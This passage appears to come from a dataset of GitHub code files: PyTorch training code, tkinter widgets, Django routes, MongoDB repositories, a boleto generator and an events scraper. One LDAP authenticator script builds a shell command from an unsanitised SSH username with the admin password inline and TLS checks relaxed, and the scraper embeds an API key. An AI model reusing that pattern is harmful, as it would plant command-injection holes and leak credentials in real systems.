scipy.io as sio\nimport numpy as np\nimport os\nfrom torch.utils.data import Dataset, DataLoader\nimport platform\nfrom argparse import ArgumentParser\nimport csdata_fast\n\nparser = ArgumentParser(description='MADUN')\nparser.add_argument('--start_epoch', type=int, default=0, help='epoch number of start training')\nparser.add_argument('--end_epoch', type=int, default=400, help='epoch number of end training')\nparser.add_argument('--finetune', type=int, default=10, help='epoch number of finetuning')\nparser.add_argument('--layer_num', type=int, default=25, help='stage number of MADUN')\nparser.add_argument('--learning_rate', type=float, default=1e-4, help='learning rate')\nparser.add_argument('--cs_ratio', type=int, default=30, help='from {10, 25, 30, 40, 50}')\nparser.add_argument('--gpu_list', type=str, default='0', help='gpu index')\nparser.add_argument('--patch_size', type=int, default=33)\nparser.add_argument('--batch_size', type=int, default=64)\nparser.add_argument('--rgb_range', type=int, default=1, help='value range 1 or 255')\nparser.add_argument('--n_channels', type=int, default=1, help='1 for gray, 3 for color')\nparser.add_argument('--channels', type=int, default=32, help='feature number')\nparser.add_argument('--matrix_dir', type=str, default='sampling_matrix', help='sampling matrix directory')\nparser.add_argument('--model_dir', type=str, default='model', help='trained or pre-trained model directory')\nparser.add_argument('--data_dir', type=str, default='data', help='training data directory')\nparser.add_argument('--train_name', type=str, default='train400', help='name of train set')\nparser.add_argument('--ext', type=str, default='.png', help='training data directory')\nparser.add_argument('--log_dir', type=str, default='log', help='log directory')\nparser.add_argument('--algo_name', type=str, default='MADUN', help='log directory')\nparser.add_argument('--data_copy', type=int, default=200, help='training data directory')\n\nargs = parser.parse_args()\n\nstart_epoch = args.start_epoch\nend_epoch = args.end_epoch\nlearning_rate = args.learning_rate\nlayer_num = args.layer_num\ncs_ratio = args.cs_ratio\ngpu_list = args.gpu_list\nchannels = args.channels\nfinetune = args.finetune\nbatch_size = args.batch_size\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = gpu_list\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nratio_dict = {10:0, 25:1, 30:2, 40:3, 50:4}\nn_input_dict = {1: 10, 4: 43, 10: 109, 25: 272, 30: 327, 40: 436, 50: 545}\n\nn_input = n_input_dict[cs_ratio]\nn_output = 1089\n\n# Load CS Sampling Matrix: phi\nPhi_data_Name = './%s/phi_0_%d_1089.mat' % (args.matrix_dir, 10)\nPhi_data = sio.loadmat(Phi_data_Name)\nPhi_input10 = Phi_data['phi']\n\nPhi_data_Name = './%s/phi_0_%d_1089.mat' % (args.matrix_dir, 25)\nPhi_data = sio.loadmat(Phi_data_Name)\nPhi_input25 = Phi_data['phi']\n\nPhi_data_Name = './%s/phi_0_%d_1089.mat' % (args.matrix_dir, 30)\nPhi_data = sio.loadmat(Phi_data_Name)\nPhi_input30 = Phi_data['phi']\n\nPhi_data_Name = './%s/phi_0_%d_1089.mat' % (args.matrix_dir, 40)\nPhi_data = sio.loadmat(Phi_data_Name)\nPhi_input40 = Phi_data['phi']\n\nPhi_data_Name = './%s/phi_0_%d_1089.mat' % (args.matrix_dir, 50)\nPhi_data = sio.loadmat(Phi_data_Name)\nPhi_input50 = Phi_data['phi']\n\n# Initialization model\ndef PhiTPhi_fun(x, PhiW, PhiTW):\n temp = F.conv2d(x, PhiW, padding=0,stride=33, bias=None)\n temp = F.conv2d(temp, PhiTW, padding=0, bias=None)\n temp = torch.nn.PixelShuffle(33)(temp)\n return temp\n\n# Define ConvLSTM\nclass ConvLSTM(nn.Module):\n def __init__(self, inp_dim, oup_dim, kernel):\n \n super().__init__()\n pad_x = 1\n self.conv_xf = nn.Conv2d(inp_dim, oup_dim, kernel, padding=pad_x)\n self.conv_xi = nn.Conv2d(inp_dim, oup_dim, kernel, padding=pad_x)\n self.conv_xo = nn.Conv2d(inp_dim, oup_dim, kernel, padding=pad_x)\n self.conv_xj = nn.Conv2d(inp_dim, oup_dim, kernel, padding=pad_x)\n\n pad_h = 1\n self.conv_hf = nn.Conv2d(oup_dim, oup_dim, kernel, padding=pad_h)\n self.conv_hi = nn.Conv2d(oup_dim, oup_dim, kernel, padding=pad_h)\n self.conv_ho = nn.Conv2d(oup_dim, oup_dim, kernel, padding=pad_h)\n self.conv_hj = nn.Conv2d(oup_dim, oup_dim, kernel, padding=pad_h)\n\n def forward(self, x, h, c): \n \n if h is None and c is None:\n i = F.sigmoid(self.conv_xi(x))\n o = F.sigmoid(self.conv_xo(x))\n j = F.tanh(self.conv_xj(x))\n c = i * j\n h = o * c\n else:\n f = F.sigmoid(self.conv_xf(x) + self.conv_hf(h))\n i = F.sigmoid(self.conv_xi(x) + self.conv_hi(h))\n o = F.sigmoid(self.conv_xo(x) + self.conv_ho(h))\n j = F.tanh(self.conv_xj(x) + self.conv_hj(h))\n c = f * c + i * j\n h = o * F.tanh(c)\n \n return h, h, c\n\n# Define RB\nclass ResidualBlock(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, bias=True):\n\n super(ResidualBlock, self).__init__()\n self.conv1 = nn.Conv2d(in_channels, out_channels, kernel_size, padding=(kernel_size//2), bias=bias)\n self.conv2 = nn.Conv2d(out_channels, out_channels, kernel_size, padding=(kernel_size//2), bias=bias)\n self.act1 = nn.ReLU(inplace=True)\n\n def forward(self, x):\n input = x\n x = self.conv1(x)\n x = self.act1(x)\n x = self.conv2(x)\n res = x\n x = res + input\n return x\n\n# Define MADUN Stage\nclass BasicBlock(torch.nn.Module):\n def __init__(self):\n \n super(BasicBlock, self).__init__()\n self.lambda_step = nn.Parameter(torch.Tensor([0.5]))\n self.conv_D = nn.Parameter(init.xavier_normal_(torch.Tensor(channels, channels+1, 3, 3)))\n self.RB1 = ResidualBlock(channels, channels, 3, bias=True)\n self.RB2 = ResidualBlock(channels, channels, 3, bias=True)\n self.conv_G = nn.Parameter(init.xavier_normal_(torch.Tensor(1, channels, 3, 3)))\n self.ConvLSTM = ConvLSTM(channels, channels, 3)\n \n def forward(self, x, z, PhiWeight, PhiTWeight, PhiTb, h, c):\n \n x = x - self.lambda_step * PhiTPhi_fun(x, PhiWeight, PhiTWeight)\n x_input = x + self.lambda_step * PhiTb\n x_a = torch.cat([x_input, z], 1)\n x_D = F.conv2d(x_a, self.conv_D, padding=1)\n x = self.RB1(x_D)\n x, h, c = self.ConvLSTM(x, h, c)\n x_backward = self.RB2(x)\n x_G = F.conv2d(x_backward, self.conv_G, padding=1)\n x_pred = x_input + x_G\n\n return x_pred, x_backward, h, c\n\n# Define MADUN\nclass MADUN(torch.nn.Module):\n def __init__(self, LayerNo):\n super(MADUN, self).__init__()\n onelayer = []\n self.LayerNo = LayerNo\n\n for i in range(LayerNo):\n onelayer.append(BasicBlock())\n\n self.fcs = nn.ModuleList(onelayer)\n self.fe = nn.Conv2d(1, channels, 3, padding=1, bias=True)\n\n def forward(self, Phix, Phi):\n\n PhiWeight = Phi.contiguous().view(n_input, 1, 33, 33)\n PhiTWeight = Phi.t().contiguous().view(n_output, n_input, 1, 1)\n PhiTb = F.conv2d(Phix, PhiTWeight, padding=0, bias=None) # 64*1089*3*3 \n PhiTb = torch.nn.PixelShuffle(33)(PhiTb)\n x = PhiTb\n [h, c] = [None, None]\n z = self.fe(x)\n\n for i in range(self.LayerNo):\n x, z, h, c = self.fcs[i](x, z, PhiWeight, PhiTWeight, PhiTb, h, c)\n \n x_final = x\n\n return x_final\n\nmodel = MADUN(layer_num)\nmodel = nn.DataParallel(model)\nmodel = model.to(device)\n\nprint_flag = 1 # print parameter number\n\nif print_flag:\n num_count = 0\n num_params = 0\n for para in model.parameters():\n num_count += 1\n num_params += para.numel()\n print('Layer %d' % num_count)\n print(para.size())\n print(\"total para num: %d\" % num_params)\n\ntraining_data = csdata_fast.SlowDataset(args)\n\nif (platform.system() ==\"Windows\"):\n rand_loader = DataLoader(dataset=training_data, batch_size=batch_size, num_workers=0,\n shuffle=True)\nelse:\n rand_loader = DataLoader(dataset=training_data, batch_size=batch_size, num_workers=8,\n shuffle=True)\n\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n\nmodel_dir = \"./%s/CS_%s_channels_%d_layer_%d_ratio_%d\" % (args.model_dir, args.algo_name, channels, layer_num, cs_ratio)\nlog_file_name = \"./%s/Log_CS_%s_channels_%d_layer_%d_ratio_%d.txt\" % (args.log_dir, args.algo_name, channels, layer_num, cs_ratio)\n\nif not os.path.exists(model_dir):\n os.makedirs(model_dir)\nif not os.path.exists(args.log_dir):\n os.makedirs(args.log_dir)\n\nif start_epoch > 0:\n pre_model_dir = model_dir\n model.load_state_dict(torch.load('./%s/net_params_%d.pkl' % (pre_model_dir, start_epoch)))\n\nPhi10 = torch.from_numpy(Phi_input10).type(torch.FloatTensor).to(device)\nPhi25 = torch.from_numpy(Phi_input25).type(torch.FloatTensor).to(device)\nPhi30 = torch.from_numpy(Phi_input30).type(torch.FloatTensor).to(device)\nPhi40 = torch.from_numpy(Phi_input40).type(torch.FloatTensor).to(device)\nPhi50 = torch.from_numpy(Phi_input50).type(torch.FloatTensor).to(device)\nPhi_matrix = {0: Phi10, 1: Phi25, 2: Phi30, 3: Phi40, 4: Phi50}\n\nmedia_epoch = end_epoch\nif finetune > 0:\n end_epoch = end_epoch + finetune\n patch_size1 = 99\n \n# Training loop\nfor epoch_i in range(start_epoch + 1, end_epoch + 1):\n\n if epoch_i > media_epoch:\n args.patch_size = patch_size1\n \n for data in rand_loader:\n batch_x = data\n batch_x = batch_x.to(device)\n batch_x = batch_x.view(-1, 1, args.patch_size, args.patch_size)\n \n Phi = Phi_matrix[ratio_dict[cs_ratio]]\n PhiWeight = Phi.contiguous().view(n_input, 1, 33, 33)\n Phix = F.conv2d(batch_x, PhiWeight, padding=0,stride=33, bias=None)\n\n x_output = model(Phix, Phi)\n\n # Compute and print loss\n loss_all = nn.L1Loss()(x_output, batch_x)\n\n # Zero gradients, perform a backward pass, and update the weights.\n optimizer.zero_grad()\n loss_all.backward()\n optimizer.step()\n\n output_data = \"[%02d/%02d] Total Loss: %.4f\\n\" % (epoch_i, end_epoch, loss_all.item())\n print(output_data)\n\n output_file = open(log_file_name, 'a')\n output_file.write(output_data)\n output_file.close()\n\n if epoch_i % 10 == 0 and epoch_i <= 400:\n torch.save(model.state_dict(), \"./%s/net_params_%d.pkl\" % (model_dir, epoch_i)) # save only the parameters\n elif epoch_i > 400:\n torch.save(model.state_dict(), \"./%s/net_params_%d.pkl\" % (model_dir, epoch_i)) # save only the parameters\n","repo_name":"songjiechong/MADUN-ACMMM2021","sub_path":"Train_CS_MADUN.py","file_name":"Train_CS_MADUN.py","file_ext":"py","file_size_in_byte":10727,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"54"} +{"seq_id":"27421170130","text":"fname = input('Enter file name ')\r\n\r\ntry:\r\n fh = open(fname)\r\nexcept:\r\n print('No such file!')\r\n quit()\r\n\r\nlst = list()\r\nlst2 = list()\r\ndc = dict()\r\n\r\n\r\nfor line in fh:\r\n if not line.startswith('From') or line.startswith('From:'): continue\r\n lst = line.split()\r\n lst2 = lst[5].split(':')\r\n dc[lst2[0]] = dc.get(lst2[0],0) + 1\r\n\r\n# print(dc)\r\n\r\n# sorting the dictionary by hour\r\n\r\n# lst3 = list()\r\n\r\nfor key,value in sorted(dc.items()):\r\n print(key,value)\r\n","repo_name":"Shridhar2025/Python_for_everybody_my_codes","sub_path":"09_tuple.py","file_name":"09_tuple.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25729969822","text":"#!/usr/bin/env python\n\"\"\"\nTakes in 1 argument provided by sshd: {username}.\nldap_authenticator.py {user}\nPrints the authorized ssh keys that can be used to access the cluster for each user.\n\"\"\"\n\nimport subprocess\nimport sys\n\nwith open(\"/efs/opt/hostname\") as fp:\n host = fp.read().rstrip()\n\nwith open(\"/efs/opt/ltpsecret\") as fp:\n user = \"'(&(objectClass=posixAccount)(uid=%s))'\" % (sys.argv[1])\n s = fp.read().rstrip()\n call = subprocess.check_output(\" \".join(['export', 'LDAPTLS_REQCERT=allow', '&&' ,'ldapsearch','-x','-H','ldaps://' + host + \":389\",'-D',\n 'cn=admin,ou=admin,dc=pcprod,dc=com', '-b', 'dc=pcprod,dc=com',\n '-s', 'sub', user, '-w', s, \"-o\", \"ldif-wrap=no\"]), shell=True, executable=\"/bin/bash\")\n\nprint(\"\\n\".join([ x.split(\": \")[1] for x in call.splitlines() if \"sshPublicKey\" in x]))","repo_name":"medcelerate/parallel-cluster","sub_path":"ldap_authenticator.py","file_name":"ldap_authenticator.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11493066806","text":"import tkinter, time, math\n\nclass FloatEntry(tkinter.Entry):\n\n def __init__(self, master, textvariable):\n super().__init__(master, textvariable = textvariable, validatecommand = self.on_validate)\n vcmd = (self.register(self.on_validate), '%P')\n self.config(validate = \"key\" ,validatecommand=vcmd)\n \n def validate(self, string):\n try:\n float(string)\n return True\n \n except:\n if string in (\"\", \"-\"):\n return True\n return False\n\n def on_validate(self, P):\n return self.validate(P) \n\n\nclass Variable_Slider_Widget(tkinter.Frame):\n\n SLIDER_DEFAULT_LOW = 0\n SLIDER_DEFAULT_HIGH = 1\n SLIDER_DEFAULT_VALUE = (SLIDER_DEFAULT_LOW + SLIDER_DEFAULT_HIGH) / 2\n\n def __init__(self, master, text, validate_func = None, result_var = None):\n super().__init__(master)\n\n self.number_of_values = 100\n\n self.label = tkinter.Label(self, text = text)\n self.label.grid(column = 0, row = 0)\n\n if result_var is None:\n self.result_var = tkinter.DoubleVar(self, value = self.SLIDER_DEFAULT_VALUE)\n self.result_var.trace_add(\"write\", validate_func)\n\n else:\n self.result_var = result_var\n \n #resolution = self.number_of_values // (self.SLIDER_DEFAULT_HIGH - self.SLIDER_DEFAULT_LOW)\n resolution = (self.SLIDER_DEFAULT_HIGH - self.SLIDER_DEFAULT_LOW) / self.number_of_values\n self.slider = tkinter.Scale(self, variable = self.result_var, from_ = self.SLIDER_DEFAULT_LOW, \n to = self.SLIDER_DEFAULT_HIGH, orient = tkinter.HORIZONTAL,\n resolution = resolution)\n\n self.slider_low_var = tkinter.DoubleVar(self, value=self.SLIDER_DEFAULT_LOW)\n self.slider_low_var.trace_add(\"write\", self.on_update_low_var)\n\n self.slider_high_var = tkinter.DoubleVar(self, value=self.SLIDER_DEFAULT_HIGH)\n self.slider_high_var.trace_add(\"write\", self.on_update_high_var)\n\n self.low_entry = FloatEntry(self, textvariable = self.slider_low_var)\n self.high_entry = FloatEntry(self, textvariable = self.slider_high_var)\n\n self.low_entry.grid(column = 1, row = 0)\n self.slider.grid(column = 2, row = 0)\n self.high_entry.grid(column = 3, row = 0)\n\n def on_update_low_var(self, var, indx, mode):\n self.slider.config(from_=self.slider_low_var.get())\n\n def on_update_high_var(self, var, indx, mode):\n self.slider.config(to_=self.slider_high_var.get())\n\n def adjust_scale_resolution(self):\n resolution = (self.slider_high_var.get() - self.slider_low_var.get()) / self.number_of_values\n\n self.slider.configure(resolution = math.ceil(resolution))\n\n def set_limits(self, low_value, high_value):\n self.slider_low_var.set(low_value)\n self.slider_high_var.set(high_value)\n\n self.adjust_scale_resolution()\n\n def set_value(self, value):\n self.result_var.set(value)\n\n def set_number_of_values(self, value):\n self.number_of_values = value\n\n self.adjust_scale_resolution()\n\n def get_value(self):\n return float(self.result_var.get())\n\n\nclass Time_Slider_Widget(tkinter.Frame):\n\n T_VAR_SPEED_LOW = 0\n T_VAR_SPEED_HIGH = 100\n\n GRAPH_REFRESH_DEAY_LOW = 10\n GRAPH_REFRESH_DEAY_HIGH = 1000\n\n def __init__(self, master, root):\n super().__init__(master)\n\n self.root = root\n\n self.t_var_speed = 1\n self.graph_refresh_delay = 500\n self.time_at_last_refresh = time.time()\n\n self.frame1 = tkinter.Frame(self)\n self.frame1.grid(column = 0, row = 0)\n\n self.label = tkinter.Label(self.frame1, text = \"t: \")\n self.label.grid(column = 0, row = 0)\n\n self.t_var = tkinter.DoubleVar()\n self.t_var_entry = FloatEntry(self.frame1, textvariable = self.t_var)\n self.t_var_entry.grid(column = 1, row = 0)\n\n self.t_var_reset = tkinter.Button(self.frame1, text = \"Reset\", command = self.on_t_var_reset_call)\n self.t_var_reset.grid(column = 2, row = 0)\n\n self.t_var_speed_slider_widget = Variable_Slider_Widget(self, \n \"Time flow rate(/s): \", validate_func = self.on_t_var_speed_change)\n self.t_var_speed_slider_widget.set_limits(self.T_VAR_SPEED_LOW, self.T_VAR_SPEED_HIGH)\n self.t_var_speed_slider_widget.set_value(self.t_var_speed)\n self.t_var_speed_slider_widget.grid(column = 0, row = 1)\n\n self.graph_refresh_delay_slider_widget = Variable_Slider_Widget(self, \n \"Graph refresh rate(ms): \", validate_func = self.on_graph_refresh_delay_change)\n self.graph_refresh_delay_slider_widget.set_limits(self.GRAPH_REFRESH_DEAY_LOW, \n self.GRAPH_REFRESH_DEAY_HIGH)\n self.graph_refresh_delay_slider_widget.set_value(self.graph_refresh_delay)\n self.graph_refresh_delay_slider_widget.grid(column = 0, row = 2)\n\n self.after(int(self.graph_refresh_delay), self.refresh_graph)\n\n def on_t_var_reset_call(self):\n self.t_var.set(0)\n\n def refresh_graph(self):\n self.after(int(self.graph_refresh_delay), self.refresh_graph)\n\n if not self.master.master.enabled:\n return\n\n old_t_var_value = self.t_var.get()\n new_t_value = old_t_var_value + self.t_var_speed * (time.time() - self.time_at_last_refresh)\n self.t_var.set(new_t_value)\n\n self.time_at_last_refresh = time.time()\n\n if \"t\" in self.root.input_frame.equations_input_frame.constants_values:\n self.master.master.constants_values[\"t\"] = new_t_value\n\n self.master.master.plot_on_graph()\n\n def on_t_var_speed_change(self, var, indx, mode):\n self.t_var_speed = self.t_var_speed_slider_widget.get_value()\n\n def on_graph_refresh_delay_change(self, var, indx, mode):\n self.graph_refresh_delay = self.graph_refresh_delay_slider_widget.get_value()\n\n def get_value(self):\n return self.t_var.get()\n\n def reset_t_value(self):\n self.t_var.set(0)\n ","repo_name":"monopolize-all/Wave-Sim","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":6092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"8821565874","text":"from django.urls import path, include\nfrom . import views\n\napp_name = 'users'\nurlpatterns = [\n # Default url for auth\n path('', include('django.contrib.auth.urls')),\n # Page for registrations\n path('register/', views.register, name='register'),\n path('registered/', views.registered, name='registered')\n]\n","repo_name":"Papsanly/LearningLog","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16593357790","text":"# -*- coding: utf-8 -*-\nfrom ..data import BoletoData, CustomProperty\n\n\nclass BoletoBanese(BoletoData):\n agencia_cedente = CustomProperty('agencia_cedente',2)\n conta_cedente = CustomProperty('conta_cedente', 9)\n nosso_numero = CustomProperty('nosso_numero', 9)\n\n def __init__(self):\n BoletoData.__init__(self)\n self.codigo_banco = \"047\"\n self.logo_image = \"logo_banese.jpg\"\n\n def _dv_nosso_numero(self):\n return str(self.modulo11(self.nosso_numero, 9, 0))\n\n @property\n def campo_livre(self):\n content = '%02d%09d%09d%03d' % (int(self.agencia_cedente),\n int(self.conta_cedente),\n int(self.nosso_numero),\n int(self.codigo_banco))\n return str('%s%s' % (content, self._dv_campo_livre(content)))\n\n\n def _dv_campo_livre(self, campo_livre):\n dv = self.modulo10(campo_livre)\n while True:\n restoMod11 = self.modulo11(campo_livre + str(dv), 7, 1)\n if restoMod11 != 1:\n break\n dv += 1\n dv %= 10\n\n return str(dv) + str(11 - restoMod11)\n","repo_name":"thallys-moura/pyboleto","sub_path":"pyboleto/bank/banese.py","file_name":"banese.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"pt","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"37824691197","text":"import abc\nfrom typing import Optional\n\nfrom pymongo import MongoClient, ASCENDING\n\nfrom ted_sws import config\nfrom ted_sws.core.model.metadata import Metadata, NormalisedMetadata, TEDMetadata, XMLMetadata\nfrom ted_sws.data_manager.adapters.repository_abc import MetadataRepositoryABC\n\nMONGODB_COLLECTION_ID = \"_id\"\nAGGREGATE_REFERENCE_ID = \"ted_id\"\nMETADATA_TYPE_ID = \"metadata_type\"\n\n\nclass BaseMetadataRepository(MetadataRepositoryABC, abc.ABC):\n \"\"\"\n This repository is intended for storing Metadata objects.\n \"\"\"\n _collection_name: str = \"notice_metadata\"\n _metadata_type: str = \"unknown\"\n\n def __init__(self, mongodb_client: MongoClient, database_name: str = None):\n database_name = database_name if database_name else config.MONGO_DB_AGGREGATES_DATABASE_NAME\n self._database_name = database_name\n self.mongodb_client = mongodb_client\n db = mongodb_client[self._database_name]\n self.collection = db[self._collection_name]\n self.collection.create_index([(AGGREGATE_REFERENCE_ID, ASCENDING)])\n self.collection.create_index([(METADATA_TYPE_ID, ASCENDING)])\n\n def _update_metadata(self, reference: str, metadata: Metadata, upsert: bool = False):\n \"\"\"\n\n :param reference:\n :param metadata:\n :param upsert:\n :return:\n \"\"\"\n if metadata is not None:\n metadata_dict = metadata.model_dump()\n metadata_dict[AGGREGATE_REFERENCE_ID] = reference\n metadata_dict[METADATA_TYPE_ID] = self._metadata_type\n reference = self._build_reference(base_reference=reference)\n metadata_dict[MONGODB_COLLECTION_ID] = reference\n self.collection.update_one({MONGODB_COLLECTION_ID: reference}, {\"$set\": metadata_dict}, upsert=upsert)\n\n def _get_metadata_dict(self, reference: str) -> Optional[dict]:\n \"\"\"\n\n :param reference:\n :return:\n \"\"\"\n reference = self._build_reference(base_reference=reference)\n result_dict = self.collection.find_one({MONGODB_COLLECTION_ID: reference})\n if result_dict:\n del result_dict[MONGODB_COLLECTION_ID]\n del result_dict[AGGREGATE_REFERENCE_ID]\n del result_dict[METADATA_TYPE_ID]\n return result_dict\n\n def _build_reference(self, base_reference: str) -> str:\n \"\"\"\n\n :param base_reference:\n :return:\n \"\"\"\n return f\"{base_reference}_{self._metadata_type}\"\n\n\n def remove(self, reference: str):\n \"\"\"\n This method remove a metadata based on an identification reference.\n :param reference:\n :return:\n \"\"\"\n reference = self._build_reference(reference)\n self.collection.delete_one({MONGODB_COLLECTION_ID: reference})\n\n\nclass NormalisedMetadataRepository(BaseMetadataRepository):\n _metadata_type: str = \"normalised\"\n\n def add(self, reference: str, metadata: NormalisedMetadata):\n \"\"\"\n This method allows you to add normalised metadata objects to the repository.\n :param reference:\n :param metadata:\n :return:\n \"\"\"\n self._update_metadata(reference=reference, metadata=metadata, upsert=True)\n\n def update(self, reference: str, metadata: NormalisedMetadata):\n \"\"\"\n This method allows you to update normalised metadata objects to the repository\n :param reference:\n :param metadata:\n :return:\n \"\"\"\n\n self._update_metadata(reference=reference, metadata=metadata)\n\n def get(self, reference: str) -> Optional[NormalisedMetadata]:\n \"\"\"\n This method allows a normalised metadata to be obtained based on an identification reference.\n :param reference:\n :return: Metadata\n \"\"\"\n\n result_dict = self._get_metadata_dict(reference=reference)\n if result_dict is not None:\n return NormalisedMetadata(**result_dict)\n return None\n\n\nclass TEDMetadataRepository(BaseMetadataRepository):\n _metadata_type: str = \"ted\"\n\n def add(self, reference: str, metadata: TEDMetadata):\n \"\"\"\n This method allows you to add ted metadata objects to the repository.\n :param reference:\n :param metadata:\n :return:\n \"\"\"\n self._update_metadata(reference=reference, metadata=metadata, upsert=True)\n\n def update(self, reference: str, metadata: TEDMetadata):\n \"\"\"\n This method allows you to update ted metadata objects to the repository\n :param reference:\n :param metadata:\n :return:\n \"\"\"\n self._update_metadata(reference=reference, metadata=metadata)\n\n def get(self, reference: str) -> Optional[TEDMetadata]:\n \"\"\"\n This method allows a ted metadata to be obtained based on an identification reference.\n :param reference:\n :return: Metadata\n \"\"\"\n\n result_dict = self._get_metadata_dict(reference=reference)\n if result_dict is not None:\n return TEDMetadata(**result_dict)\n return None\n\n\nclass XMLMetadataRepository(BaseMetadataRepository):\n _metadata_type: str = \"xml\"\n\n def add(self, reference: str, metadata: XMLMetadata):\n \"\"\"\n This method allows you to add xml metadata objects to the repository.\n :param reference:\n :param metadata:\n :return:\n \"\"\"\n self._update_metadata(reference=reference, metadata=metadata, upsert=True)\n\n def update(self, reference: str, metadata: XMLMetadata):\n \"\"\"\n This method allows you to update xml metadata objects to the repository\n :param reference:\n :param metadata:\n :return:\n \"\"\"\n\n self._update_metadata(reference=reference, metadata=metadata)\n\n def get(self, reference: str) -> Optional[XMLMetadata]:\n \"\"\"\n This method allows a xml metadata to be obtained based on an identification reference.\n :param reference:\n :return: Metadata\n \"\"\"\n\n result_dict = self._get_metadata_dict(reference=reference)\n if result_dict is not None:\n return XMLMetadata(**result_dict)\n return None\n","repo_name":"OP-TED/ted-rdf-conversion-pipeline","sub_path":"ted_sws/data_manager/adapters/metadata_repository.py","file_name":"metadata_repository.py","file_ext":"py","file_size_in_byte":6202,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"8007644444","text":"# -*- coding: utf-8 -*-\n# <nbformat>3.0</nbformat>\n\n# <codecell>\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom time import sleep\nimport time\nimport datetime\nimport requests\nfrom xml.dom import *\nimport xml.etree.cElementTree\nimport unicodedata\nimport numpy\nimport os\nfrom dbwriteevents import eventscornell\nimport re\nfrom collections import Counter\n\nimport xmllib\n\n# <codecell>\n\n\n\n#generates a traversibe DOM tree from unicode text of an XML document, must normalize utf-8 into ascii\n#\ndef genTree(utf8Txt):\n src = unicodedata.normalize('NFKD', utf8Txt).encode('ascii','ignore')\n tree = xml.etree.cElementTree.fromstring(src)\n return tree\n\n#separates the events from the localist XML, returning a list of event subtrees\n#\ndef getEvents(tree):\n events = tree.findall('event')\n return events\n\n#gets text, which in this program is XML, from a web page\n#\ndef getTextFromURL(url):\n somePage = requests.get(url)\n return somePage.text\n somePage.close()\n\n#savesPageTxt to a file for later access\n#\ndef savePageTxt(utfTxt,fn):\n \n ts = time.time()\n st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d_%H.%M.%S')\n \n fn = open(fn+st,\"w\")\n\n try:\n fn.write(utfTxt.encode('utf8'))\n finally:\n fn.close\n \n#locates the 'meta' tag of the returned XML to determine the total number of pages an API call returned\n#\ndef determineNumPages(tree):\n return int(tree.find('meta').find('num_pages').text)\n\n#gets thh Nth page of an API querry\n#\ndef getNthPage(startURL,pageNum):\n return getTextFromURL(startURL+\"&page=\"+str(pageNum))\n\n#gets a week of events from Cornell's localist API which returns XML\n# \ndef getWeekOfEvents():\n eventsURL = \"http://events.cornell.edu/api/school/10/events?api_key=KLhy2GtuSAGirYGY&days=7&pp=50\"\n firstPageTxt = getTextFromURL(eventsURL)\n firstTree = genTree(firstPageTxt)\n allEvents = []\n \n numPages = determineNumPages(firstTree)\n \n curPageNum = 1\n while curPageNum <= numPages:\n curTree = genTree(getNthPage(eventsURL,curPageNum))\n allEvents += getEvents(curTree)\n numPages=determineNumPages(curTree)\n curPageNum+=1\n time.sleep(1)\n \n return allEvents\n\n#gets years worth of food events, was originally used to train a bayesian classifier which failed. Therefore, this function\n#isn't really used...but yet I left it in here...maybe it will one day be useful.\n#\ndef getLotsOfFoodEvents():\n foodURL = \"http://events.cornell.edu/api/school/10/events?api_key=KLhy2GtuSAGirYGY&days=7&pp=50&start=2010-01-01&end=2013-11-20&type=4259\"\n \n firstPageTxt = getTextFromURL(foodURL)\n firstTree = genTree(firstPageTxt)\n allEvents = []\n \n numPages = determineNumPages(firstTree)\n \n foodEvents=[]\n \n curPageNum = 1\n while curPageNum <= numPages:\n foodTxt = getNthPage(foodURL,curPageNum)\n savePageTxt(foodTxt,\"FoodTraining\"+str(curPageNum))\n curTree = genTree(foodTxt)\n foodEvents += getEvents(curTree)\n numPages=determineNumPages(curTree)\n curPageNum+=1\n time.sleep(1)\n \n return foodEvents\n\n#Gets a week of food events from cornell's API and returns a list of XML trees that represent each event\n#\ndef getWeekOfFoodEvents():\n foodURL = \"http://events.cornell.edu/api/school/10/events?api_key=KLhy2GtuSAGirYGY&days=7&pp=50&type=4259\"\n \n firstPageTxt = getTextFromURL(foodURL)\n firstTree = genTree(firstPageTxt)\n allEvents = []\n \n numPages = determineNumPages(firstTree)\n \n foodEvents=[]\n \n curPageNum = 1\n while curPageNum <= numPages:\n foodTxt = getNthPage(foodURL,curPageNum)\n curTree = genTree(foodTxt)\n foodEvents += getEvents(curTree)\n numPages=determineNumPages(curTree)\n curPageNum+=1\n time.sleep(1)\n \n return foodEvents\n\n# <codecell>\n\n#gets the relevant info from a single event, and returns it as a dictionary\n#\ndef getRelevantInfo(foodEventInformation):\n info = foodEventInformation\n \n #this is a list of the desired information that we want, these correspond to the columns of a mySQL database\n desired = ['title','start','description','end','free','ticket_price','location','room_number','latitude','longitude']\n# desired = ['title','start','end','free','ticket_price','location','room_number']\n \n \n rel = dict()\n \n #pulls the relevant information from a verbose dictionary of foodEventInformation\n for key in desired:\n try:\n val = info[key]\n rel[key] = val\n except KeyError:\n rel[key] = \"\"\n# print 'rel',rel['room_number'] \n# print rel \n return rel\n \n#takes in a list of event trees, iterates over that list, and returns list of dictionaries using getRelevantInfo.\n#the dictionaries contain the event information that we found worthwhile for a datebase of food events.\n#\ndef getFoodInfoForDB(foodEvents):\n fes = foodEvents\n fesInfo = []\n \n for fe in fes:\n info = dict()\n\n for i in fe.iter():\n key = 